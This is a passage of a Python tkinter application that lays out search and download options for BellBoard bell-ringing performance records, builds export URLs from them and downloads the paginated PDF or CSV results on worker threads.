self.font_large = ("Arial Bold", 18)
self.font_medium = ("Arial Bold", 14)
self.font_normal = ("Arial Bold", 10)
self.font_small = ("Arial", 8)
self.outputWindow_width = 82
self.outputWindow_height = 30
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_windows
elif system() == "Linux":
self.font_large = ("Arial Bold", 24)
self.font_medium = ("Arial Bold", 16)
self.font_normal = ("Arial Bold", 14)
self.font_small = ("Arial", 12)
self.outputWindow_width = 82
self.outputWindow_height = 38
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_linux
elif system() == "Darwin":
self.font_large = ("Arial Bold", 24)
self.font_medium = ("Arial Bold", 16)
self.font_normal = ("Arial Bold", 14)
self.font_small = ("Arial", 12)
self.outputWindow_width = 82
self.outputWindow_height = 38
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_mac
else:
self.font_large = ("Arial Bold", 24)
self.font_medium = ("Arial Bold", 16)
self.font_normal = ("Arial Bold", 14)
self.font_small = ("Arial", 12)
self.outputWindow_width = 82
self.outputWindow_height = 38
self.pad = { 'x' : {'none':0, 'small':5, 'medium':10, 'large':15},
'y' : {'none':0, 'small':5, 'medium':10, 'large':15} }
self.fullScreen = False
self.windowSizeState = self._windowSizeState_other
self.backgroundColour = "#474641"
self._findProgramDirectory()
tk.Frame.__init__(self, root)
root.configure(background=self.backgroundColour)
#root.geometry("")
self.windowSizeState()
root.title(self.programTitle)
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
menu = Menu(root)
self.canvas = tk.Canvas(root, borderwidth=0, highlightthickness=0, background=self.backgroundColour)
self.frame = tk.Frame(self.canvas, background=self.backgroundColour)
#self.vsb = tk.Scrollbar(root, orient="vertical", command=self.canvas.yview)
#self.canvas.configure(yscrollcommand=self.vsb.set)
#self.hsb = tk.Scrollbar(root, orient="horizontal", command=self.canvas.xview)
#self.canvas.configure(xscrollcommand=self.hsb.set)
if system() == "Windows":
self.canvas.bind_all("<MouseWheel>", self._onMousewheel_windows)
elif system() == "Linux":
self.canvas.bind_all("<MouseWheel>", self._onMousewheel_linux)
elif system() == "Darwin":
self.canvas.bind_all("<MouseWheel>", self._onMousewheel_mac)
else:
print("Warning: Could not determine OS platform, assuming Windows")
self.canvas.bind_all("<MouseWheel>", self._on_mousewheel_windows)
#self.vsb.pack(side="right", fill="y")
#self.hsb.pack(side="bottom", fill="x")
self.canvas.pack(side="left", fill="both", expand=True)
self.canvas.create_window((0, 0), window=self.frame, anchor="nw",
tags="self.frame")
self.canvas.bind("<Configure>", self._onResize)
self.frame.bind("<Configure>", self._onResize)
self.frame.bind("<Configure>", self._onFrameConfigure)
self.frame.grid_propagate=1
for i in range(7):
self.frame.columnconfigure(i, weight=1)
self.frame.columnconfigure(4, weight=0)
self.frame.columnconfigure(5, weight=0)
for i in range(27):
self.frame.rowconfigure(i, weight=1)
self.frame.pack(fill="both", expand=True)
#self.frame.grid(row=0, column=0, sticky="EW")
#self.frame.pack()
self.state = "normal"
self.populate()
self.downloader = Downloader(self.frame, self.options, self.advancedOptions)
self.populate_downloadOptions()
self.downloader.update_Download(self.downloadOptions)
def printing_thread(self, info_text):
"""
Function to put the printing of information, errors, etc, onto a seperate thread to the main thread.
"""
self.info_text = info_text
# Create Buffer class object
self.buf = Buffer()
self.log = Logger(after=self.after, after_cancel=self.after_cancel, startingText=self.programTitle,
logFileName=self.programDirectory+"log.txt", logWriteRate=500)
self.log.start()
# Set stdout to output to buf
# This allows us to display a virtual terminal that intercepts print statements from imported classes
sys.stdout = self.buf
# Check and refresh buf
self.print_rate = 150
self.print_rate_original = self.print_rate
self.read_std_out()
self.printing_thread = Thread(target=printing_thread, args=(self, self.info_text))
self.printing_thread.start()
def _findProgramDirectory(self):
# determine if application is a script file or frozen exe
if getattr(sys, 'frozen', False):
application_path = os.path.dirname(sys.executable)
elif __file__:
application_path = os.path.join(os.getcwd(), "")
self.programDirectory = application_path
if system() == "Darwin":
if ".app" in self.programDirectory:
while not self.programDirectory.endswith('.app'):
self.programDirectory = os.path.dirname(self.programDirectory)
self.programDirectory = os.path.dirname(self.programDirectory)
# Check to see if trailing slash
if self.programDirectory[-1] == "/" or self.programDirectory[-1] == "/":
pass
else:
self.programDirectory = os.path.join(self.programDirectory, "")
def _windowSizeState_windows(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
else:
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
root.state("zoomed")
def _windowSizeState_mac(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
#root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
root.geometry("")
else:
root.state("zoomed")
def _windowSizeState_linux(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
else:
root.attributes('-zoomed', True)
def _windowSizeState_other(self):
if self.fullScreen == True:
root.attributes('-fullscreen', self.fullScreen)
self.screenWidth, self.screenHeight = root.winfo_screenwidth(), root.winfo_screenheight()
root.geometry("%dx%d+0+0" % (self.screenWidth, self.screenHeight))
else:
root.state("zoomed")
def _onResize(self, event):
"""
Resize the tkinter canvas and frame on the user changing the size of the window.
"""
self.width = event.width
self.height = event.height
self.canvas.configure(width=self.width, height=self.height)
self.frame.configure(width=self.width, height=self.height)
def _onFrameConfigure(self, event):
'''Reset the scroll region to encompass the inner frame'''
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def _onMousewheel_windows(self, event):
'''Enable frame scrolling for Windows'''
#self.canvas.xview_scroll(int(-1*(event.delta/120)), "units")
self.canvas.yview_scroll(int(-1*(event.delta/120)), "units")
def _onMousewheel_linux(self, event):
'''Enable frame scrolling for Linux'''
#self.canvas.xview_scroll(int(-1*(event.delta/120)), "units")
self.canvas.yview_scroll(int(-1*(event.delta/120)), "units")
def _onMousewheel_mac(self, event):
'''Enable frame scrolling for Mac'''
#self.canvas.xview_scroll(int(-1*(event.delta)), "units")
self.canvas.yview_scroll(int(-1*(event.delta)), "units")
def populate(self):
"""
Populate the tkinter frame with the bellboard search options and advanced search options.
"""
row_i = 0
col_i = 0
lbl_title = Label(self.frame, text=self.programTitle, font=self.font_large, background=self.backgroundColour,
padx=self.pad['x']['small'], column=col_i, row=row_i, columnspan=2)
row_i += 1
col_i = 0
self.options = BBOption(self.frame, self.state, self.backgroundColour, fontDefault=self.font_normal, pad=self.pad)
self.options.add_label(tag="association", text="Association:", padx=self.pad['x']['small'], column=col_i, row=row_i, columnspan=2)
self.options.add_entry(tag="association", width=32, padx=self.pad['x']['medium'], column=col_i, row=row_i+1, columnspan=2)
row_i += 1
row_i += 1
col_i = 0
self.options.add_label(tag="dateRungFrom", text="From (dd/mm/yyyy):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="dateRungFrom", width=10, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
self.options.add_label(tag="dateRungTo", text="To (dd/mm/yyyy):", padx=self.pad['x']['small'], column=col_i+1, row=row_i)
self.options.add_entry(tag="dateRungTo", width=10, padx=self.pad['x']['medium'], column=col_i+1, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.options.add_label(tag="place", text="Place:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="place", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
col_i += 1
self.options.add_label(tag="county", text="County (or Country):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="county", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
col_i += 1
self.options.add_label(tag="dedication", text="Dedication (or Address):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="dedication", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.options.add_label(tag="ringingLength", text="Lengths:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_checkbox(tag="allLengths", text="All Lengths", padx=self.pad['x']['medium'], checkState=True, column=col_i, row=row_i+1)
self.options.add_checkbox(tag="shortTouches", text="Short Touches", padx=self.pad['x']['medium'], column=col_i, row=row_i+2)
self.options.add_checkbox(tag="quarters", text="Quarter Peals", padx=self.pad['x']['medium'], column=col_i, row=row_i+3)
self.options.add_checkbox(tag="quartersOrLonger", text="Qtrs or Longer", padx=self.pad['x']['medium'], column=col_i, row=row_i+4)
self.options.add_checkbox(tag="dateTouches", text="Date Touches", padx=self.pad['x']['medium'], column=col_i, row=row_i+6)
self.options.add_checkbox(tag="halfPeals", text="Half Peals", padx=self.pad['x']['medium'], column=col_i, row=row_i+7)
self.options.add_checkbox(tag="peals", text="Peals", padx=self.pad['x']['medium'], column=col_i, row=row_i+8)
self.options.add_checkbox(tag="longLengths", text="Long Lengths", padx=self.pad['x']['medium'], column=col_i, row=row_i+9)
col_i += 1
self.options.add_label(tag="ringingMethod", text="Method (or Performance Title):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="ringingMethod", width=24, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
col_i += 1
self.options.add_label(tag="bellType", text="Type (Tower or Hand):", padx=self.pad['x']['small'], column=col_i, row=row_i)
bellTypeOptions = ["Tower and Hand", "Handbells Only", "Tower Bells Only"]
self.options.add_combobox(tag="bellType", menuOptions=bellTypeOptions, width=15, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
#self.options.add_checkbox(tag="towerAndHand", text="Tower and Hand", column=col_i, row=row_i+1)
#self.options.add_checkbox(tag="handbellsOnly", text="Handbells Only", column=col_i, row=row_i+2)
#self.options.add_checkbox(tag="towerBellsOnly", text="Tower Bells Only", column=col_i, row=row_i+3)
row_i += 9
row_i += 1
col_i = 0
self.options.add_label(tag="ringerName", text="Ringer:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.options.add_entry(tag="ringerName", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
self.options.add_label(tag="conductorName", text="Conductor:", padx=self.pad['x']['small'], column=col_i+1, row=row_i)
self.options.add_entry(tag="conductorName", width=16, padx=self.pad['x']['medium'], column=col_i+1, row=row_i+1)
self.options.add_label(tag="composerName", text="Composer:", padx=self.pad['x']['small'], column=col_i+2, row=row_i)
self.options.add_entry(tag="composerName", width=16, padx=self.pad['x']['medium'], column=col_i+2, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.advancedOptions = BBOption(self.frame, self.state, self.backgroundColour, fontDefault=self.font_normal, pad=self.pad)
self.advancedOptions.add_label(tag="bellRung", text="Bell Rung (e.g. 2 or n-1):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.advancedOptions.add_entry(tag="bellRung", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
self.advancedOptions.add_label(tag="otherRinger", text="Other Ringer:", padx=self.pad['x']['small'], column=col_i+1, row=row_i)
self.advancedOptions.add_entry(tag="otherRinger", width=16, padx=self.pad['x']['medium'], column=col_i+1, row=row_i+1)
self.advancedOptions.add_label(tag="otherRingersBell", text="Other Ringer's Bell:", padx=self.pad['x']['small'], column=col_i+2, row=row_i)
self.advancedOptions.add_entry(tag="otherRingersBell", width=16, padx=self.pad['x']['medium'], column=col_i+2, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.advancedOptions.add_label(tag="compDetails", text="Composition Details:", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.advancedOptions.add_entry(tag="compDetails", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
row_i += 1
row_i += 1
col_i = 0
self.advancedOptions.add_label(tag="footnote", text="Footnote (Contains Word):", padx=self.pad['x']['small'], column=col_i, row=row_i)
self.advancedOptions.add_entry(tag="footnote", width=16, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
row_i -= 3
col_i = 1
self.advancedOptions.add_checkbox(tag="withPhoto", text="With Photo", padx=self.pad['x']['small'], column=col_i, row=row_i+1)
self.advancedOptions.add_checkbox(tag="withComposition", text="With Composition", padx=self.pad['x']['small'], column=col_i, row=row_i+2)
self.advancedOptions.add_checkbox(tag="machineReadableComposition", text="Machine-Readable Composition", padx=self.pad['x']['small'], column=col_i, row=row_i+3)
self.advancedOptions.add_checkbox(tag="excludedNonCompliantPerformances", text="Exclude Non-Compliant Performances", padx=self.pad['x']['small'], column=col_i, row=row_i+4)
self.advancedOptions.add_checkbox(tag="ringerIsConductor", text="Ringer is Conductor", padx=self.pad['x']['small'], column=col_i, row=row_i+5)
self.advancedOptions.add_checkbox(tag="ringerIsStrapper", text="Ringer is Strapper", padx=self.pad['x']['small'], column=col_i, row=row_i+6)
row_i += 6
row_i -= 1
col_i = 0
self.advancedOptions.add_label(tag="orderBy", text="Order By:", padx=self.pad['x']['small'], column=col_i, row=row_i)
menuOptions = ["Date Rung", "Date Submitted", "Place", "Length",
"Duration", "Peal Speed", "Method (or Title)",
"Score From Likes", "Number of Likes", "Performance Views"]
self.advancedOptions.add_combobox(tag="orderByMenu", menuOptions=menuOptions, width=15, padx=self.pad['x']['medium'], column=col_i, row=row_i+1)
#self.advancedOptions.add_checkbox(tag="orderByDateRung", text="Date Rung", column=col_i+1, row=row_i+1)
#self.advancedOptions.add_checkbox(tag="orderByDateSubmitted", text="Date Submitted", column=col_i, row=row_i+1)
#self.advancedOptions.add_checkbox(tag="orderByPlace", text="Place", column=col_i+1, row=row_i+2)
#self.advancedOptions.add_checkbox(tag="orderByLength", text="Length", column=col_i, row=row_i+2)
#self.advancedOptions.add_checkbox(tag="orderByDuration", text="Duration", column=col_i+1, row=row_i+3)
#self.advancedOptions.add_checkbox(tag="orderByPealSpeed", text="Peal Speed", column=col_i, row=row_i+3)
#self.advancedOptions.add_checkbox(tag="orderByMethod(orTitle)", text="Method (or Title)", column=col_i+1, row=row_i+4)
#self.advancedOptions.add_checkbox(tag="orderByScoreFromLikes", text="Score From Likes", column=col_i, row=row_i+4)
#self.advancedOptions.add_checkbox(tag="orderByNumberOfLikes", text="Number of Likes", column=col_i+1, row=row_i+5)
#self.advancedOptions.add_checkbox(tag="orderByPerformanceViews", text="Performance Views", column=col_i, row=row_i+5)
row_i += 1#1
self.advancedOptions.add_checkbox(tag="reverseResults", text="Reverse Order of Results", checkState=True, padx=self.pad['x']['small'], column=col_i, row=row_i+1)
def populate_downloadOptions(self):
"""
Populate the tkinter frame with the download options.
"""
col_i = 4
row_i = 0
columnSpan_max = 4
self.downloadOptions = BBOption(self.frame, self.state, self.backgroundColour, fontDefault=self.font_normal, pad=self.pad)
self.downloadOptions.add_label(tag="downloadOptions", text="Download Options:", font=self.font_medium, padx=self.pad['x']['small'],
column=col_i, row=row_i, columnspan=columnSpan_max)
row_i += 1
self.downloadOptions.add_label(tag="savePath", text="Save Path and File Name:", padx=self.pad['x']['small'], column=col_i, row=row_i, columnspan=columnSpan_max)
self.downloadOptions.add_entry(tag="savePath", sanatiseEntry=False, width=56, padx=self.pad['x']['medium'], column=col_i, row=row_i+1, columnspan=columnSpan_max)
self.downloadOptions.entry["savePath"].set(self.programDirectory)
row_i += 2
#self.browseDirButton = BrowseButton(self.frame, self.downloadOptions, text="Select Path", startingFileName=self.programDirectory, browseType="browsePath",
# command=self.downloadOptions.entry["savePath"].set,
# background=self.backgroundColour,
# pady=self.pad['y']['small'],
# column=col_i, row=row_i)
self.downloadOptions.add_browseButton(tag="browseFileButton", options=self.downloadOptions, text="Select Path and Filename", startingFileName=self.programDirectory, browseType="selectFile",
command=self.downloadOptions.entry["savePath"].set,
background=self.backgroundColour,
padx=self.pad['x']['medium'],
pady=self.pad['y']['small'],
column=col_i, row=row_i, columnspan=columnSpan_max)
self.downloadOptions.add_checkbox(tag="lengthAutomaticallyOnEndOfFilename", text='Length on end of filename (e.g. "Name_allLengths.pdf")', checkState=True,
padx=self.pad['x']['small'], column=col_i, row=row_i+1, columnspan=columnSpan_max)
row_i += 1
self.downloadOptions.add_checkbox(tag="downloadPDF", text="Download as PDF", checkState=True, padx=self.pad['x']['small'],
column=col_i, row=row_i+1, columnspan=1)
self.downloadOptions.add_checkbox(tag="downloadCSV", text="Download as CSV", checkState=True, padx=self.pad['x']['small'],
column=col_i+1, row=row_i+1, columnspan=1)
row_i += 2
self.downloadOptions.add_button(tag="downloadbutton", text="Download", options=self.options, command=self.downloader.download_start,
padx=self.pad['x']['medium'],column=col_i, row=row_i, columnspan=1)
row_i += 1
self.info_text = Text(self.frame, startingText=self.programTitle, column=col_i, row=row_i, width=self.outputWindow_width, height=self.outputWindow_height,
columnspan=columnSpan_max, rowspan=23, padx=self.pad['x']['small'], pady=self.pad['y']['medium'], sticky="NESW")
def read_std_out(self):
    """Drain captured stdout into the info box, then reschedule itself.

    Started once; re-registers itself with Tk's after() every
    self.print_rate milliseconds so print() output keeps appearing.
    """
    pending = self.buf.read()
    if pending:
        self.add_info(pending)
        self.buf.clear()  # discard what was just displayed
    # Re-arm the periodic poll.
    self.after(self.print_rate, self.read_std_out)
def add_info(self, info):
    """
    Append a message to the read-only info box. Use instead of print().
    arguments: (str) info
    effects: adds the line to the on-screen info box and, when logging is
             enabled, mirrors it to the log
    """
    # Normalise: strip trailing whitespace, force str, re-add one newline.
    line = str(info.rstrip()) + "\n"
    if self.log.logging:
        self.log.write(line)
    widget = self.info_text.info_text
    widget.config(state=NORMAL)   # temporarily make the box writable
    widget.insert(END, line)
    widget.see(END)               # keep the newest line visible
    widget.config(state=DISABLED)
def reset_print_rate(self):
    """Restore the stdout polling interval to its start-up value."""
    self.print_rate = self.print_rate_original
class DownloadWorkerThread(threading.Thread):
    """
    A worker thread to download the results of a specific BellBoard search.

    Input is done by placing a [url, saveName] list into the queue passed
    in download_q. The thread is stopped by calling its join() method.
    """

    def __init__(self, download_q):
        """arguments: (queue.Queue) download_q -- queue of [url, saveName] pairs"""
        super(DownloadWorkerThread, self).__init__()
        self.download_q = download_q
        self.stoprequest = threading.Event()

    def run(self):
        """
        As long as we weren't asked to stop, try to take new tasks from the queue. The tasks are
        taken with a blocking 'get', so no CPU cycles are wasted while waiting. Also, 'get' is
        given a timeout, so stoprequest is always checked, even if there's nothing in the queue.
        """
        while not self.stoprequest.is_set():  # is_set(): isSet() is deprecated
            try:
                self.url, self.saveName = self.download_q.get(True, 0.05)
                self._dowloadFile()
            except queue.Empty:
                continue

    def join(self, timeout=None):
        """Ask the worker to stop, then wait for it to finish."""
        self.stoprequest.set()
        super(DownloadWorkerThread, self).join(timeout)

    def _dowloadFile(self):
        """
        Function to do the actual download. Kept seperate to allow for multithreading.

        BellBoard paginates exports, so pages are fetched until an empty body
        comes back; CSV pages are appended, PDF pages merged with PyPDF2.
        """
        maxDownloadAttmpts = 5
        page = 1
        paging = True
        while paging:
            downloadAttmptCount = 0
            while downloadAttmptCount < maxDownloadAttmpts:
                try:
                    myfile = requests.get(self.url + "&page={}".format(page))
                    # Success: the sentinel (max + 1) both exits the retry loop
                    # and distinguishes success from exhausted retries below.
                    downloadAttmptCount = maxDownloadAttmpts + 1
                except requests.exceptions.RequestException as err:
                    # BUGFIX: err must be converted with str() before
                    # concatenation -- the old code raised TypeError here.
                    print("Error in downloading file:\n " + str(err) + "\n Trying download again...")
                    downloadAttmptCount += 1
            if downloadAttmptCount == maxDownloadAttmpts:
                print("Error: Could not download file in allowed number of attempts, please try again")
            elif downloadAttmptCount == maxDownloadAttmpts + 1:
                if myfile.text == "":
                    # An empty page means we ran off the end of the results.
                    paging = False
                else:
                    if self.saveName[-3:] == "csv":
                        if page == 1:
                            print("Downloading page 1 of BellBoard search results into output CSV")
                            with open(self.saveName, 'wb') as fileOutput:
                                fileOutput.write(myfile.content)
                        else:
                            print("Merging page {} of BellBoard results into output CSV".format(page))
                            with open(self.saveName, 'ab') as fileOutput:
                                fileOutput.write(myfile.content)
                    elif self.saveName[-3:] == "pdf":
                        if page == 1:
                            print("Downloading page 1 of BellBoard search results into output PDF")
                            with open(self.saveName, 'wb') as fileOutput:
                                fileOutput.write(myfile.content)
                        else:
                            # (removed a redundant re-check of the pdf suffix here)
                            print("Merging page {} of BellBoard results into output PDF".format(page))
                            merger = PdfFileMerger()
                            merger.append(PdfFileReader(open(self.saveName, 'rb')))
                            merger.append(PdfFileReader(io.BytesIO(myfile.content)))
                            merger.write(self.saveName)
                    page += 1
        print("{} downloaded and merged!".format(self.saveName))
class Downloader():
    """
    Downloader class.

    Builds BellBoard export URLs from the three GUI option panels and feeds
    one download job per (length, format) combination to a pool of
    DownloadWorkerThread workers.
    """

    def __init__(self, frame, options, advancedOptions, downloadOptions=None):
        """
        arguments: frame            -- parent GUI frame
                   options          -- basic search option panel
                   advancedOptions  -- advanced search option panel
                   downloadOptions  -- download panel; may be None here and
                                       supplied later via update_Download()
        """
        self.frame = frame
        self.options = options
        self.advancedOptions = advancedOptions
        self.downloadOptions = downloadOptions

    def update_Download(self, downloadOptions):
        """
        Function to update the Downloader class object. Used to allow the class to be initialised without
        the download options being available, as they can be passed in with this function later.
        """
        self.downloadOptions = downloadOptions

    def download_start(self):
        """
        Wrapper around download function to allow it to run and wait for all threads to have finished
        without causing the main window of the program to freeze up.
        """
        mainDownloadThread = Thread(target=self.download)
        mainDownloadThread.start()

    def download(self):
        """
        Function to download files. Goes through the download options and downloads files for those options, with a seperate
        file for each ringing length, and for PDF and CSV, depending on given options.

        Runs on a worker thread (see download_start); disables the option
        panels while downloads are in flight and re-enables them at the end.
        """
        if self.options.entry["ringerName"].get() == "" and self.options.entry["conductorName"].get() == "" and self.options.entry["composerName"].get() == "":
            print('Error: Need at least one of Ringer, Conductor, or Composer to be filled in!')
        else:
            self.options.updateState("disabled")
            self.advancedOptions.updateState("disabled")
            self.downloadOptions.updateState("disabled")
            # Snapshot of every option; used only for the summary print-out below.
            self.urlOptions = {"Association":self.options.entry["association"].get(sanatise=False),
                               "From":self.options.entry["dateRungFrom"].get(sanatise=False),
                               "To":self.options.entry["dateRungTo"].get(sanatise=False),
                               "Place":self.options.entry["place"].get(sanatise=False),
                               "County":self.options.entry["county"].get(sanatise=False),
                               "Dedication":self.options.entry["dedication"].get(sanatise=False),
                               "All Lengths":self.options.checkbox["allLengths"].get(),
                               "Short Touches":self.options.checkbox["shortTouches"].get(),
                               "Quarter Peals":self.options.checkbox["quarters"].get(),
                               "Qtrs or Longer":self.options.checkbox["quartersOrLonger"].get(),
                               "Date Touches":self.options.checkbox["dateTouches"].get(),
                               "Half Peals":self.options.checkbox["halfPeals"].get(),
                               "Peals":self.options.checkbox["peals"].get(),
                               "Long Lengths":self.options.checkbox["longLengths"].get(),
                               "Method":self.options.entry["ringingMethod"].get(sanatise=False),
                               "Bell Type":self.options.combobox["bellType"].get(),
                               "Ringer Name":self.options.entry["ringerName"].get(sanatise=False),
                               "Conductor Name":self.options.entry["conductorName"].get(sanatise=False),
                               "Composer Name":self.options.entry["composerName"].get(sanatise=False),
                               "Bell Rung":self.advancedOptions.entry["bellRung"].get(sanatise=False),
                               "Other Ringer":self.advancedOptions.entry["otherRinger"].get(sanatise=False),
                               "Other Ringer's Bell":self.advancedOptions.entry["otherRingersBell"].get(sanatise=False),
                               "Composition Details":self.advancedOptions.entry["compDetails"].get(sanatise=False),
                               "Footnote":self.advancedOptions.entry["footnote"].get(),
                               "With Photo":self.advancedOptions.checkbox["withPhoto"].get(),
                               "With Composition":self.advancedOptions.checkbox["withComposition"].get(),
                               "Machine-Readable Composition":self.advancedOptions.checkbox["machineReadableComposition"].get(),
                               "Exclude Non-Compliant Performances":self.advancedOptions.checkbox["excludedNonCompliantPerformances"].get(),
                               "Ringer is Conductor":self.advancedOptions.checkbox["ringerIsConductor"].get(),
                               "Ringer is Strapper":self.advancedOptions.checkbox["ringerIsStrapper"].get(),
                               "Order By":self.advancedOptions.combobox["orderByMenu"].get(),
                               "Reverse Results":self.advancedOptions.checkbox["reverseResults"].get(),
                               "PDF":self.downloadOptions.checkbox["downloadPDF"].get(),
                               "CSV":self.downloadOptions.checkbox["downloadCSV"].get(),
                               "Length Automatically on End of Filename":self.downloadOptions.checkbox["lengthAutomaticallyOnEndOfFilename"].get()}
            self.baseUrl = "https://bb.ringingworld.co.uk/export.php?"
            # Options
            # NOTE(review): user-entered values are inserted into the query
            # string without urllib.parse.quote(); special characters may
            # break the request -- confirm against BellBoard's behaviour.
            url = self.baseUrl + "association=" + self.options.entry["association"].get()
            url += "&from=" + self.options.entry["dateRungFrom"].get()
            url += "&to=" + self.options.entry["dateRungTo"].get()
            url += "&place=" + self.options.entry["place"].get()
            # BUGFIX: this previously read '"®ion="' (mojibake of the HTML
            # entity '&reg;'), sending a corrupt parameter instead of the
            # county/region filter.
            url += "&region=" + self.options.entry["county"].get()
            url += "&address=" + self.options.entry["dedication"].get()
            url += "&title=" + self.options.entry["ringingMethod"].get()
            if self.options.combobox["bellType"].get() == "Tower and Hand":
                pass
            elif self.options.combobox["bellType"].get() == "Handbells Only":
                url += "&bells_type=hand"
            elif self.options.combobox["bellType"].get() == "Tower Bells Only":
                url += "&bells_type=tower"
            url += "&ringer=" + self.options.entry["ringerName"].get()
            url += "&conductor=" + self.options.entry["conductorName"].get()
            url += "&composer=" + self.options.entry["composerName"].get()
            # Advanced Options
            url += "&ringer_bell=" + self.advancedOptions.entry["bellRung"].get()
            url += "&ringer2=" + self.advancedOptions.entry["otherRinger"].get()
            url += "&ringer2_bell=" + self.advancedOptions.entry["otherRingersBell"].get()
            url += "&details=" + self.advancedOptions.entry["compDetails"].get()
            url += "&footnote=" + self.advancedOptions.entry["footnote"].get()
            for advancedOptionsCheckbox in self.advancedOptions.checkbox:
                if self.advancedOptions.checkbox[advancedOptionsCheckbox].get() == True:
                    if advancedOptionsCheckbox == "withPhoto":
                        url += "&has_media"
                        print("Info: Currently can only download the performances but not their photos!")
                    if advancedOptionsCheckbox == "withComposition":
                        url += "&with_composition"
                    if advancedOptionsCheckbox == "machineReadableComposition":
                        url += "&machine_comp=1"
                    if advancedOptionsCheckbox == "excludedNonCompliantPerformances":
                        url += "&compliant"
                    if advancedOptionsCheckbox == "ringerIsConductor":
                        url += "&ringer_is_conductor"
                    if advancedOptionsCheckbox == "ringerIsStrapper":
                        url += "&ringer_is_strapper"
            if self.advancedOptions.combobox["orderByMenu"].get() == "Date Rung":
                url += "&order="
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Date Submitted":
                url += "&order=newest"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Place":
                url += "&order=place"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Length":
                url += "&order=changes"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Duration":
                url += "&order=duration"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Peal Speed":
                url += "&order=peal_speed"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Method (or Title)":
                url += "&order=title"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Score From Likes":
                # NOTE(review): other order keys are lower-case; confirm
                # whether BellBoard expects "Score" or "score" here.
                url += "&order=Score"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Number of Likes":
                url += "&order=likes"
            elif self.advancedOptions.combobox["orderByMenu"].get() == "Performance Views":
                url += "&order=views"
            if self.advancedOptions.checkbox["reverseResults"].get() is True:
                url += "+reverse"
            # Print options being used
            downloading_output_print = ""
            downloading_output_print += "Using Options:"
            for key in self.urlOptions:
                if self.urlOptions[key] == "" or self.urlOptions[key] == False:
                    pass
                else:
                    downloading_output_print += "\n   {}: {}".format(key, self.urlOptions[key])
            print(downloading_output_print)
            # Create a single input and a single output queue for all threads.
            download_q = queue.Queue()
            numberOfFilesToDownload = 0
            print("Files to Download:")
            self.urlBefore = "{}".format(url)
            for length in self.options.checkbox:
                url_andSaveName = []
                if self.options.checkbox[length].get() == True:
                    if self.downloadOptions.checkbox["lengthAutomaticallyOnEndOfFilename"].get():
                        lengthName = "_"+length
                    else:
                        lengthName = ""
                    saveName=self.downloadOptions.entry["savePath"].get()+lengthName
                    url += "&length="
                    if length == "allLengths":
                        pass
                        # Pass with addition to URL
                    elif length == "shortTouches":
                        url += "short"
                    elif length == "quarters":
                        url += "quarter"
                    elif length == "quartersOrLonger":
                        url += "q-or-p"
                    elif length == "dateTouches":
                        url += "date"
                    elif length == "halfPeals":
                        url += "half"
                    elif length == "peals":
                        url += "peal"
                    elif length == "longLengths":
                        url += "long"
                    if self.downloadOptions.checkbox["downloadPDF"].get() == True:
                        # Download PDF
                        print("   {}".format(saveName+'.pdf'))
                        url_andSaveName.append(url+"&fmt="+"pdf")
                        # os.sep replaces os.path.join(" ", "")[-1] -- same
                        # character, clearer intent (path ends in a separator
                        # means the user gave no filename).
                        if saveName[-1] == os.sep:
                            print('   Warning, filename not given, using "bellBoardDefault" instead!')
                            url_andSaveName.append(saveName+"bellBoardDefault"+".pdf")
                        else:
                            url_andSaveName.append(saveName+".pdf")
                        download_q.put(url_andSaveName)
                        url_andSaveName = []
                        numberOfFilesToDownload += 1
                    if self.downloadOptions.checkbox["downloadCSV"].get() == True:
                        # Download CSV
